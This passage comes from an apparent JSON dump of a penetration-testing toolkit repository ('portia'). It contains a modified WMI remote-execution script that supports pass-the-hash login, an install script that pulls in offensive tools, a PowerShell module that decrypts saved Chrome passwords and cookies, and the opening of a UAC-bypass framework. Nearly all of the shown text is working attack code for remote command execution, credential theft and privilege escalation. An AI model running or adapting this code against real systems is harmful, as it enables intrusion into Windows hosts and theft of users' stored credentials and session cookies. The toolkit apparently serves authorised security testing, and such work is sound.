    "content": "#!/usr/bin/env python\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# A similar approach to smbexec but executing commands through WMI.\n# Main advantage here is it runs under the user (has to be Admin) \n# account, not SYSTEM, plus, it doesn't generate noisy messages\n# in the event log that smbexec.py does when creating a service.\n# Drawback is it needs DCOM, hence, I have to be able to access \n# DCOM ports at the target machine.\n#\n# Author:\n#  beto (@agsolino)\n#\n# Reference for:\n#  DCOM\n#\n\nimport sys\nimport os\nimport cmd\nimport argparse\nimport time\nimport logging\nimport string\nimport ntpath\n\nfrom impacket.examples import logger\nfrom impacket import version\nfrom impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dtypes import NULL\n\nOUTPUT_FILENAME = '__' + str(time.time())\nCODEC = sys.getdefaultencoding()\n\ntotalOutput=\"\"\ntotalOutput1=''\n\nclass WMIEXEC:\n    def __init__(self, command='', username='', password='', domain='', hashes=None, aesKey=None, share=None,\n                 noOutput=False, doKerberos=False, kdcHost=None):\n        self.__command = command\n        self.__username = username\n        self.__password = password\n        self.__domain = domain\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__aesKey = aesKey\n        self.__share = share\n        self.__noOutput = noOutput\n        self.__doKerberos = doKerberos\n        self.__kdcHost = kdcHost\n        self.shell = None\n        if hashes is not None:\n            self.__lmhash, self.__nthash = hashes.split(':')\n\n    def getOutput(self):\n        global totalOutput\n        totalOutput1=''\n        totalOutput1=totalOutput\n        totalOutput=''\n        return totalOutput1\n\n    def run(self, addr):\n        if self.__noOutput is False:\n            try:\n                smbConnection = SMBConnection(addr, addr)\n                if self.__doKerberos is False:\n                    smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n                else:\n                    smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n                                                self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)\n\n                dialect = smbConnection.getDialect()\n                if dialect == SMB_DIALECT:\n                    logging.info(\"SMBv1 dialect used\")\n                elif dialect == SMB2_DIALECT_002:\n                    logging.info(\"SMBv2.0 dialect used\")\n                elif dialect == SMB2_DIALECT_21:\n                    logging.info(\"SMBv2.1 dialect used\")\n                else:\n                    logging.info(\"SMBv3.0 dialect used\")\n            except Exception as e:\n                return e\n                sys.stdout.flush()\n                sys.exit(1)\n        else:\n            smbConnection = None\n\n        dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n                              self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)\n        try:\n            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)\n            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n            iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n            iWbemLevel1Login.RemRelease()\n\n            win32Process,_ = iWbemServices.GetObject('Win32_Process')\n\n            self.shell = RemoteShell(self.__share, win32Process, smbConnection)\n            if self.__command != ' ':\n                self.shell.onecmd(self.__command)\n            else:\n                self.shell.cmdloop()\n        except  (Exception, KeyboardInterrupt), e:\n            global totalOutput\n            totalOutput=str(e)\n            #logging.error(str(e))\n            try:\n                if smbConnection is not None:\n                    smbConnection.logoff()\n            except:\n                pass\n            try:\n                dcom.disconnect()\n            except:\n                pass\n            sys.stdout.flush()\n            return str(e)\n            #sys.exit(1)\n\n        try:\n            if smbConnection is not None:\n                smbConnection.logoff()\n        except:\n                pass\n        dcom.disconnect()\n\n\nclass RemoteShell(cmd.Cmd):\n    def __init__(self, share, win32Process, smbConnection):\n        cmd.Cmd.__init__(self)\n        self.__share = share\n        self.__output = '\\\\' + OUTPUT_FILENAME\n        self.__outputBuffer = unicode('')\n        self.__shell = 'cmd.exe /Q /c '\n        self.__win32Process = win32Process\n        self.__transferClient = smbConnection\n        self.__pwd = unicode('C:\\\\')\n        self.__noOutput = False\n        self.intro = '[!] Launching semi-interactive shell - Careful what you execute\\n[!] Press help for extra shell commands'\n\n        # We don't wanna deal with timeouts from now on.\n        if self.__transferClient is not None:\n            self.__transferClient.setTimeout(100000)\n            self.do_cd('\\\\')\n        else:\n            self.__noOutput = True\n\n    def do_shell(self, s):\n        os.system(s)\n\n    def do_help(self, line):\n        print \"\"\"\n lcd {path}                 - changes the current local directory to {path}\n exit                       - terminates the server process (and this session)\n put {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)\n get {file}                 - downloads pathname to the current local dir \n ! {cmd}                    - executes a local shell cmd\n\"\"\" \n\n    def do_lcd(self, s):\n        if s == '':\n            print os.getcwd()\n        else:\n            try:\n                os.chdir(s)\n            except Exception, e:\n                logging.error(str(e))\n\n    def do_get(self, src_path):\n        try:\n            import ntpath\n            newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path))\n            drive, tail = ntpath.splitdrive(newPath) \n            filename = ntpath.basename(tail)\n            fh = open(filename,'wb')\n            logging.info(\"Downloading %s\\\\%s\" % (drive, tail))\n            self.__transferClient.getFile(drive[:-1]+'$', tail, fh.write)\n            fh.close()\n        except Exception, e:\n            logging.error(str(e))\n            os.remove(filename)\n            pass\n\n    def do_put(self, s):\n        try:\n            params = s.split(' ')\n            if len(params) > 1:\n                src_path = params[0]\n                dst_path = params[1]\n            elif len(params) == 1:\n                src_path = params[0]\n                dst_path = ''\n\n            src_file = os.path.basename(src_path)\n            fh = open(src_path, 'rb')\n            dst_path = string.replace(dst_path, '/','\\\\')\n            import ntpath\n            pathname = ntpath.join(ntpath.join(self.__pwd,dst_path), src_file)\n            drive, tail = ntpath.splitdrive(pathname)\n            logging.info(\"Uploading %s to %s\" % (src_file, pathname))\n            self.__transferClient.putFile(drive[:-1]+'$', tail, fh.read)\n            fh.close()\n        except Exception, e:\n            logging.critical(str(e))\n            pass\n\n    def do_exit(self, s):\n        return True\n\n    def emptyline(self):\n        return False\n\n    def do_cd(self, s):\n        self.execute_remote('cd ' + s)\n        if len(self.__outputBuffer.strip('\\r\\n')) > 0:\n            #print self.__outputBuffer.decode(CODEC)\n            self.__outputBuffer = ''\n        else:\n            self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s.decode(sys.stdin.encoding)))\n            self.execute_remote('cd ')\n            self.__pwd = self.__outputBuffer.strip('\\r\\n').decode(CODEC)\n            self.prompt = unicode(self.__pwd + '>').encode(sys.stdout.encoding)\n            self.__outputBuffer = ''\n\n    def default(self, line):\n        # Let's try to guess if the user is trying to change drive\n        if len(line) == 2 and line[1] == ':':\n            # Execute the command and see if the drive is valid\n            self.execute_remote(line)\n            if len(self.__outputBuffer.strip('\\r\\n')) > 0: \n                # Something went wrong\n                #print self.__outputBuffer.decode(CODEC)\n                self.__outputBuffer = ''\n            else:\n                # Drive valid, now we should get the current path\n                self.__pwd = line\n                self.execute_remote('cd ')\n                self.__pwd = self.__outputBuffer.strip('\\r\\n')\n                self.prompt = unicode(self.__pwd + '>').encode(sys.stdout.encoding)\n                self.__outputBuffer = ''\n        else:\n            if line != '':\n                self.send_data(line)\n\n    def get_output(self):\n        def output_callback(data):\n            self.__outputBuffer += data\n\n        if self.__noOutput is True:\n            self.__outputBuffer = ''\n            return\n\n        while True:\n            try:\n                self.__transferClient.getFile(self.__share, self.__output, output_callback)\n                break\n            except Exception, e:\n                if str(e).find('STATUS_SHARING_VIOLATION') >=0:\n                    # Output not finished, let's wait\n                    time.sleep(1)\n                    pass\n                elif str(e).find('Broken') >= 0:\n                    # The SMB Connection might have timed out, let's try reconnecting\n                    logging.debug('Connection broken, trying to recreate it')\n                    self.__transferClient.reconnect()\n\t\t    #herezzz\n                    return self.get_output()\n        self.__transferClient.deleteFile(self.__share, self.__output)\n\n    def execute_remote(self, data):\n        command = self.__shell + data \n        if self.__noOutput is False:\n            command += ' 1> ' + '\\\\\\\\127.0.0.1\\\\%s' % self.__share + self.__output  + ' 2>&1'\n        self.__win32Process.Create(command.decode(sys.stdin.encoding), self.__pwd, None)\n\t#hereyyy\n        self.get_output()\n\n    def send_data(self, data):\n\tglobal totalOutput\n        try:\n            self.execute_remote(data)\n    \t    totalOutput = self.__outputBuffer.decode(CODEC)\n            #print self.__outputBuffer.decode(CODEC)\n        except UnicodeDecodeError, e:\n            logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n                          'https://docs.python.org/2.4/lib/standard-encodings.html\\nand then execute wmiexec.py '\n                          'again with -codec and the corresponding codec')\n            #print self.__outputBuffer\n        self.__outputBuffer = ''\n\nclass AuthFileSyntaxError(Exception):\n    \n    '''raised by load_smbclient_auth_file if it encounters a syntax error\n    while loading the smbclient-style authentication file.'''\n\n    def __init__(self, path, lineno, reason):\n        self.path=path\n        self.lineno=lineno\n        self.reason=reason\n    \n    def __str__(self):\n        return 'Syntax error in auth file %s line %d: %s' % (\n            self.path, self.lineno, self.reason )\n\ndef load_smbclient_auth_file(path):\n\n    '''Load credentials from an smbclient-style authentication file (used by\n    smbclient, mount.cifs and others).  returns (domain, username, password)\n    or raises AuthFileSyntaxError or any I/O exceptions.'''\n\n    lineno=0\n    domain=None\n    username=None\n    password=None\n    for line in open(path):\n        lineno+=1\n\n        line = line.strip()\n\n        if line.startswith('#') or line=='':\n            continue\n            \n        parts = line.split('=',1)\n        if len(parts) != 2:\n            raise AuthFileSyntaxError(path, lineno, 'No \"=\" present in line')\n        \n        (k,v) = (parts[0].strip(), parts[1].strip())\n        \n        if k=='username':\n            username=v\n        elif k=='password':\n            password=v\n        elif k=='domain':\n            domain=v\n        else:\n            raise AuthFileSyntaxError(path, lineno, 'Unknown option %s' % repr(k))\n            \n    return (domain, username, password)\n\n# Process command-line arguments.\nif __name__ == '__main__':\n    # Init the example's logger theme\n    logger.init()\n    #print version.BANNER\n\n    parser = argparse.ArgumentParser(add_help = True, description = \"Executes a semi-interactive shell using Windows \"\n                                                                    \"Management Instrumentation.\")\n    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')\n    parser.add_argument('-share', action='store', default = 'ADMIN$', help='share where the output will be grabbed from '\n                                                                           '(default ADMIN$)')\n    parser.add_argument('-nooutput', action='store_true', default = False, help='whether or not to print the output '\n                                                                                '(no SMB connection created)')\n    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n    parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n                                                       '\"%s\"). If errors are detected, run chcp.com at the target, '\n                                                       'map the result with '\n                          'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '\n                          'again with -codec and the corresponding codec ' % CODEC)\n\n    parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will '\n                                                                  'launch a semi-interactive shell')\n\n    group = parser.add_argument_group('authentication')\n\n    group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n    group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n    group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n                       'ones specified in the command line')\n    group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n                                                                            '(128 or 256 bits)')\n    group.add_argument('-dc-ip', action='store',metavar = \"ip address\",  help='IP Address of the domain controller. If '\n                       'ommited it use the domain part (FQDN) specified in the target parameter')\n    group.add_argument('-A', action=\"store\", metavar = \"authfile\", help=\"smbclient/mount.cifs-style authentication file. \"\n                                                                        \"See smbclient man page's -A option.\")\n\n    if len(sys.argv)==1:\n        parser.print_help()\n        sys.exit(1)\n\n    options = parser.parse_args()\n\n    if options.codec is not None:\n        CODEC = options.codec\n\n    if ' '.join(options.command) == ' ' and options.nooutput is True:\n        logging.error(\"-nooutput switch and interactive shell not supported\")\n        sys.exit(1)\n    \n    if options.debug is True:\n        logging.getLogger().setLevel(logging.DEBUG)\n    else:\n        logging.getLogger().setLevel(logging.INFO)\n\n    import re\n\n    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(\n        options.target).groups('')\n\n    #In case the password contains '@'\n    if '@' in address:\n        password = password + '@' + address.rpartition('@')[0]\n        address = address.rpartition('@')[2]\n\n    try:\n        if options.A is not None:\n            (domain, username, password) = load_smbclient_auth_file(options.A)\n            logging.debug('loaded smbclient auth file: domain=%s, username=%s, password=%s' % (repr(domain), repr(username), repr(password)))\n        \n        if domain is None:\n            domain = ''\n\n        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n            from getpass import getpass\n            password = getpass(\"Password:\")\n\n        if options.aesKey is not None:\n            options.k = True\n        '''\n    \tprint ' '.join(options.command)\n    \tprint username\n    \tprint password\n    \tprint domain\n    \tprint options.hashes\n    \tprint options.aesKey\n    \tprint options.share\n    \tprint options.nooutput\n    \tprint options.k\n    \tprint options.dc_ip\n        '''\n\n        executer = WMIEXEC(' '.join(options.command), username, password, domain, options.hashes, options.aesKey,\n                           options.share, options.nooutput, options.k, options.dc_ip)\n        executer.run(address)\n    except (Exception, KeyboardInterrupt), e:\n        #import traceback\n        #print traceback.print_exc()\n        #print \"here\"\n        logging.error(str(e))\n    sys.exit(0)\n"
  },
  {
    "path": "install.sh",
    "content": "#!/bin/sh\n#Contributed by @jivoi \n\napt-get update\napt-get install -y autoconf automake autopoint libtool pkg-config\n\nvirtualenv -p python2 portia\nsource portia/bin/activate\npip install pysmb tabulate termcolor xmltodict pyasn1 pycrypto pyOpenSSL dnspython netaddr nmap pymssql\n\nln -sf /opt /pentest\n\ncd /opt\ngit clone https://github.com/CoreSecurity/impacket\npython setup.py install\n\ncd /opt\ngit clone https://github.com/libyal/libesedb.git && cd libesedb\n./synclibs.sh\n./autogen.sh\n\ncd /opt\ngit clone https://github.com/csababarta/ntdsxtract && cd ntdsxtract\npython setup.py install\n\ncd /opt\ngit clone https://github.com/milo2012/portia.git && cd portia\n./portia.py\n"
  },
  {
    "path": "modules/BrowserGather.ps1",
    "content": "# Instructions: import the module, then perform the commanded needed.\n# Currently only supports Chrome credential extraction, more to come!\n\n# Chrome Credential Extraction\n# Use: Get-ChromeCreds [path to Login Data]\n# Path is optional, use if automatic search doesn't work\n\nfunction Get-ChromeCreds() {\n\tParam(\n\t\t[String]$Path\n\t)\n\n\tif ([String]::IsNullOrEmpty($Path)) {\n\t\t$Path = \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\t}\n\n\tif (![system.io.file]::Exists($Path))\n\t{\n\t\tWrite-Error 'Chrome db file doesnt exist, or invalid file path specified.'\n\t\tBreak\n\t}\n\n\tAdd-Type -AssemblyName System.Security\n\t# Credit to Matt Graber for his technique on using regular expressions to search for binary data\n\t$Stream = New-Object IO.FileStream -ArgumentList \"$Path\", 'Open', 'Read', 'ReadWrite'\n\t$Encoding = [system.Text.Encoding]::GetEncoding(28591)\n\t$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding\n\t$BinaryText = $StreamReader.ReadToEnd()\n\t$StreamReader.Close()\n\t$Stream.Close()\n\n\t# First the magic bytes for the password. Ends using the \"http\" for the next entry.\n\t$PwdRegex = [Regex] '(\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)[\\s\\S]*?(?=\\x68\\x74\\x74\\x70|\\Z)'\n\t$PwdMatches = $PwdRegex.Matches($BinaryText)\n\t$PwdNum = 0\n\t$DecPwdArray = @()\n\t$PwdMatchCount = $PwdMatches.Count\n\t\n\t# Decrypt the password macthes and put them in an array\n\tForeach ($Pwd in $PwdMatches) {\n\t\t$Pwd = $Encoding.GetBytes($PwdMatches[$PwdNum])\n\t\t$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)\n\t\t$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)\n\t\t$DecPwdArray += $DecPwd\n\t\t$PwdNum += 1\n\t}\n\n\t# Now the magic bytes for URLs/Users. Look behind here is the look ahead for passwords.\n\t$UserRegex = [Regex] '(?<=\\x0D\\x0D\\x0D[\\s\\S]{2}\\x68\\x74\\x74\\x70)[\\s\\S]*?(?=\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)'\n\t$UserMatches = $UserRegex.Matches($BinaryText)\n\t$UserNum = 0\n\t$UserMatchCount = $UserMatches.Count\n\t$UserArray = @()\n\t\n\t# Check to see if number of users matches the number of passwords. If the values are different, very likely that there was a regex mismatch.\n\t# All returned values should be treated with caution if this error is presented. May be out of order.\n\t\n\tif (-NOT ($UserMatchCount -eq $PwdMatchCount)) { \n\t$Mismatch = [string]\"The number of users is different than the number of passwords! This is most likely due to a regex mismatch.\"\n\tWrite-Error $Mismatch\n\t}\n\t\n\t# Add back the \"http\" used in the regex lookahead\n\t$HTTP = \"http\"\n\t# Put the URL/User matches into an array\n\tForeach ($User in $UserMatches) {\n\t\t$User = $Encoding.GetBytes($UserMatches[$UserNum])\n\t\t$User = $HTTPEnc + $User\n\t\t$UserString = [System.Text.Encoding]::Default.GetString($User)\n\t\t$UserString = $HTTP + $UserString\n\t\t$UserArray += $UserString\n\t\t$UserNum += 1\n\t}\n\t\n\t# Now create an object to store the previously created arrays\n\t$ArrayFinal = New-Object -TypeName System.Collections.ArrayList\n\tfor ($i = 0; $i -lt $UserNum; $i++) {\n\t\t$ObjectProp = @{\n\t\t\tUserURL = $UserArray[$i]\n\t\t\tPassword = $DecPwdArray[$i]\n\t\t}\n\t\n\t\t$obj = New-Object PSObject -Property $ObjectProp\n\t\t$ArrayFinal.Add($obj) | Out-Null\n\t}\n\t$ArrayFinal\n}\n\n# Chrome Cookie Extraction\n# Use: Get-ChromeCookies [path to Cookies]\n# Path is optional, use if automatic search doesn't work\n\nfunction Get-ChromeCookies() {\n\tParam(\n\t\t[String]$Path\n\t)\n\n\tif ([String]::IsNullOrEmpty($Path)) {\n\t\t$Path = \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies\"\n\t}\n\n\tif (![system.io.file]::Exists($Path))\n\t{\n\t\tWrite-Error 'Chrome db file doesnt exist, or invalid file path specified.'\n\t\tBreak\n\t}\n\tAdd-Type -AssemblyName System.Security\n\t# Credit to Matt Graber for his technique on using regular expressions to search for binary data\n\t$Stream = New-Object IO.FileStream -ArgumentList $Path, 'Open', 'Read', 'ReadWrite'\n\t$Encoding = [system.Text.Encoding]::GetEncoding(28591)\n\t$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding\n\t$BinaryText = $StreamReader.ReadToEnd()\n\t$StreamReader.Close()\n\t$Stream.Close()\n\n\t# Regex for the encrypted blob. Starting bytes were easy, but the terminating bytes were tricky. Four different scenarios are covered.\n\t$BlobRegex = [Regex] '(\\x01\\x00\\x00\\x00\\xD0\\x8C\\x9D\\xDF\\x01\\x15\\xD1\\x11\\x8C\\x7A\\x00\\xC0\\x4F\\xC2\\x97\\xEB\\x01\\x00\\x00\\x00)[\\s\\S]*?(?=[\\s\\S]{2}\\x97[\\s\\S]{8}\\x00[\\s\\S]{2}\\x0D|\\x0D[\\s\\S]{2}\\x00[\\s\\S]{3}\\x00\\x02|\\x00{20}|\\Z)'\n\t$BlobMatches = $BlobRegex.Matches($BinaryText)\n\t$BlobNum = 0\n\t$DecBlobArray = @()\n\t$BlobMatchCount = $BlobMatches.Count\n\n\t# Attempt to decrypt the blob. If it fails, a null byte is added to the end.\n\t# If it fails again, most likely due to non-contiguous storage. The blob value will be changed.\n\t# Then puts results into an array.\n\t\n\tForeach ($Blob in $BlobMatches) {\n\t\t$Blob = $Encoding.GetBytes($BlobMatches[$BlobNum])\n\t\ttry {\n\t\t\t$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Blob,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)\n\t\t}\n\t\tcatch { \n\t\t\t$Blob = $Blob + \" 0\"\n\t\t\ttry { \n\t\t\t\t$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Blob,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)\n\t\t\t}\n\t\t\tcatch { \n\t\t\t\t$Decrypt = [string]\"Unable to decrypt blob\"\n\t\t\t\t$DecBlob = [string]\"Unable to decrypt blob\"\n\t\t\t\t$Error = [string]\"Unable to decrypt blob. The value of the cookie will be changed to (Unable to decrypt blob).\"\n\t\t\t\tWrite-Error $Error\n\t\t\t}\t\n\t\t}\n\t\t$DecBlob = [System.Text.Encoding]::Default.GetString($Decrypt)\n\t\t$DecBlobArray += $DecBlob\n\t\t$BlobNum += 1\n\t}\n\n\t# Regex for cookie hostname, name, and path, in that order. Inital magic bytes were very tricky. Reads until a null byte value is found.\n\t\n\t$CookieRegex = [Regex] '(?<=\\x97[\\s\\S]{8}\\x00[\\s\\S]{2}\\x0D[\\s\\S]{11,12})[\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x2d\\x21\\x20\\x22\\x20\\x23\\x20\\x24\\x20\\x25\\x20\\x26\\x20\\x27\\x20\\x28\\x20\\x29\\x20\\x2a\\x20\\x2b\\x2d\\x20\\x2e\\x20\\x2f\\x3a\\x3c\\x20\\x3d\\x20\\x3e\\x20\\x3f\\x20\\x40\\x5b\\x20\\x5c\\x20\\x5d\\x20\\x5e\\x20\\x5f\\x20\\x60\\x7b\\x20\\x7c\\x20\\x7d\\x20\\x7e\\x2c]{3,}?(?=[\\x00\\x01\\x02\\x03])'\n\t$CookieMatches = $CookieRegex.Matches($BinaryText)\n\t$CookieMatchCount = $CookieMatches.Count\n\n\t# Check to see if number of cookies matches the number of encrypted blobs. If the values are different, very likely that there was a regex mismatch.\n\t# All returned values should be treated with caution if this error is presented. May be out of order.\n\t\n\tif (-NOT ($CookieMatchCount -eq $BlobMatchCount)) { \n\t\t$Mismatch = [string]\"The number of cookies is different than the number of encrypted blobs! This is most likely due to a regex mismatch.\"\n\t\tWrite-Error $Mismatch\n\t}\n\n\t# Put cookies into an array.\n\t\n\t$CookieNum = 0\n\t$CookieArray = @()\n\tForeach ($Cookie in $CookieMatches) {\n\t\t$Cookie = $Encoding.GetBytes($CookieMatches[$CookieNum])\n\t\t$CookieString = [System.Text.Encoding]::Default.GetString($Cookie)\n\t\t$CookieArray += $CookieString\n\t\t$CookieNum += 1\n\t}\n\n\t# Now create an object to store the previously created arrays.\n\t\n\t$ArrayFinal = New-Object -TypeName System.Collections.ArrayList\n\tfor ($i = 0; $i -lt $CookieNum; $i++) {\n\t\t$ObjectProp = @{\n\t\t\tBlob = $DecBlobArray[$i]\n\t\t\tCookie = $CookieArray[$i]\n\t\t}\n\t\n\t\t$obj = New-Object PSObject -Property $ObjectProp\n\t\t$ArrayFinal.Add($obj) | Out-Null\n\t}\n\t$ArrayFinal\n}\n"
  },
  {
    "path": "modules/Bypass-UAC.ps1",
    "content": "function Bypass-UAC {\r\n<#\r\n.SYNOPSIS\r\nBypass-UAC provides a framework to perform UAC bypasses based on auto\r\nelevating IFileOperation COM object method calls. This is not a new\r\ntechnique, traditionally, this is accomplished by injecting a DLL into\r\n\"explorer.exe\". This is not desirable because injecting into\r\nexplorer may trigger security alerts and working with unmanaged DLL's\r\nmakes for an inflexible work-flow.\r\n\r\nTo get around this, Bypass-UAC implements a function which rewrites\r\nPowerShell's PEB to give it the appearance of \"explorer.exe\". This\r\nprovides the same effect because COM objects exclusively rely on Windows's\r\nProcess Status API (PSAPI) which reads the process PEB.\r\n\r\n#-------------------#\r\n# Supported Methods #\r\n#-------------------#\r\n\r\n+ UacMethodSysprep: x32/x64 Win7-Win8\r\n+ ucmDismMethod: x64 Win7+ (unpatched, tested up to 10RS2 14926)\r\n+ UacMethodMMC2: x64 Win7+ (unpatched, tested up to 10RS2 14926)\r\n+ UacMethodTcmsetup: x32/x64 Win7-10 (UAC \"0day\" ¯\\_(ツ)_/¯)\r\n+ UacMethodNetOle32: x32/x64 Win7-10 (UAC \"0day\" ¯\\_(ツ)_/¯)\r\n\r\n.DESCRIPTION\r\nAuthor: Ruben Boonen (@FuzzySec)\r\nLicense: BSD 3-Clause\r\nRequired Dependencies: None\r\nOptional Dependencies: None\r\n\r\n.PARAMETER Method\r\n\r\nSwitch array of supported methods.\r\n\r\n.PARAMETER CustomDll\r\n\r\nAbsolute path to custom proxy DLL. If not provided, the embedded Yamabiko\r\nDLL is used.\r\n\r\n.EXAMPLE\r\nC:\\PS> Bypass-UAC -Method UacMethodSysprep\r\n\r\n.EXAMPLE\r\nC:\\PS> Bypass-UAC -Method ucmDismMethod -CustomDll C:\\Users\\b33f\\Desktop\\cmd.dll\r\n#>\r\n\tparam(\r\n        [Parameter(Mandatory = $True)]\r\n        [ValidateSet('UacMethodSysprep','ucmDismMethod','UacMethodMMC2','UacMethodTcmsetup','UacMethodNetOle32')]\r\n        [String]$Method,\r\n        [Parameter(Mandatory = $False)]\r\n        [String]$CustomDll = $null\r\n    )\r\n\r\n    #---------------\r\n    # PSReflect => reflect all the things!\r\n    # https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1\r\n    #---------------\r\n    function New-InMemoryModule\r\n    {\r\n    <#\r\n    .SYNOPSIS\r\n    \r\n    Creates an in-memory assembly and module\r\n    \r\n    Author: Matthew Graeber (@mattifestation)\r\n    License: BSD 3-Clause\r\n    Required Dependencies: None\r\n    Optional Dependencies: None\r\n    \r\n    .DESCRIPTION\r\n    \r\n    When defining custom enums, structs, and unmanaged functions, it is\r\n    necessary to associate to an assembly module. This helper function\r\n    creates an in-memory module that can be passed to the 'enum',\r\n    'struct', and Add-Win32Type functions.\r\n    \r\n    .PARAMETER ModuleName\r\n    \r\n    Specifies the desired name for the in-memory assembly and module. If\r\n    ModuleName is not provided, it will default to a GUID.\r\n    \r\n    .EXAMPLE\r\n    \r\n    $Module = New-InMemoryModule -ModuleName Win32\r\n    #>\r\n    \r\n        Param\r\n        (\r\n            [Parameter(Position = 0)]\r\n            [ValidateNotNullOrEmpty()]\r\n            [String]\r\n            $ModuleName = [Guid]::NewGuid().ToString()\r\n        )\r\n    \r\n        $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())\r\n        $LoadedAssemblies = $AppDomain.GetAssemblies()\r\n    \r\n        foreach ($Assembly in $LoadedAssemblies) {\r\n            if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {\r\n                return $Assembly\r\n            }\r\n        }\r\n    \r\n        $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)\r\n        $Domain = $AppDomain\r\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')\r\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)\r\n    \r\n        return $ModuleBuilder\r\n    }\r\n    \r\n    \r\n    # A helper function used to reduce typing while defining function\r\n    # prototypes for Add-Win32Type.\r\n    function func\r\n    {\r\n        Param\r\n        (\r\n            [Parameter(Position = 0, Mandatory = $True)]\r\n            [String]\r\n            $DllName,\r\n        \r\n            [Parameter(Position = 1, Mandatory = $True)]\r\n            [string]\r\n            $FunctionName,\r\n        \r\n            [Parameter(Position = 2, Mandatory = $True)]\r\n            [Type]\r\n            $ReturnType,\r\n        \r\n            [Parameter(Position = 3)]\r\n            [Type[]]\r\n            $ParameterTypes,\r\n        \r\n            [Parameter(Position = 4)]\r\n            [Runtime.InteropServices.CallingConvention]\r\n            $NativeCallingConvention,\r\n        \r\n            [Parameter(Position = 5)]\r\n            [Runtime.InteropServices.CharSet]\r\n            $Charset,\r\n        \r\n            [String]\r\n            $EntryPoint,\r\n        \r\n            [Switch]\r\n            $SetLastError\r\n        )\r\n    \r\n        $Properties = @{\r\n            DllName = $DllName\r\n            FunctionName = $FunctionName\r\n            ReturnType = $ReturnType\r\n        }\r\n    \r\n        if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }\r\n        if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }\r\n        if ($Charset) { $Properties['Charset'] = $Charset }\r\n        if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }\r\n        if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }\r\n    \r\n        New-Object PSObject -Property $Properties\r\n    }\r\n    \r\n    \r\n    function Add-Win32Type\r\n    {\r\n    <#\r\n    .SYNOPSIS\r\n    \r\n    Creates a .NET type for an unmanaged Win32 function.\r\n    \r\n    Author: Matthew Graeber (@mattifestation)\r\n    License: BSD 